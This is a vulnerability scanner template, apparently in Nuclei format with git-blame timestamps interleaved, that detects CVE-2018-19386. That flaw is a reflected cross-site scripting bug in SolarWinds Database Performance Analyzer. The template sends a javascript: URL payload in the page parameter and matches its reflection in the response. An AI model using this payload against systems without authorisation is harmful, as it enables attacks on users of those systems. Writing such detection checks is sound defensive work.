2021-01-02 05:00:39 +00:00
id : CVE-2018-19386
2020-09-09 01:45:42 +00:00
info :
name : SolarWinds Database Performance Analyzer 11.1. 457 - Cross Site Scripting
author : pikpikcu
severity : medium
2022-05-17 09:18:12 +00:00
description : SolarWinds Database Performance Analyzer 11.1.457 contains an instance of Reflected XSS in its idcStateError component, where the page parameter is reflected into the HREF of the 'Try Again' Button on the page, aka a /iwc/idcStateError.iwc?page= URI.
2022-04-22 10:38:41 +00:00
reference :
- https://www.cvedetails.com/cve/CVE-2018-19386/
2022-05-17 09:18:12 +00:00
- https://i.imgur.com/Y7t2AD6.png
- https://medium.com/greenwolf-security/reflected-xss-in-solarwinds-database-performance-analyzer-988bd7a5cd5
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2018-19386
cwe-id : CWE-79
2022-04-22 10:38:41 +00:00
tags : cve,cve2018,solarwinds,xss
2020-09-09 01:45:42 +00:00
requests :
- method : GET
path :
2020-10-15 18:50:10 +00:00
- "{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"
2020-09-09 01:45:42 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
2020-10-15 18:50:10 +00:00
- '<a href="javascript:alert(document.domain)//'